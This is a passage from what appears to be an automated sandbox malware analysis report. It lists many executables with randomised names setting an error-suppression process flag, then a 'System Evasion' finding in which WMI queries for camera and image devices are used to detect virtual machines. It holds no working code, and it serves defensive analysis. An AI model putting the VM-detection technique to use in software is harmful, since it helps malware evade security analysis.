                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
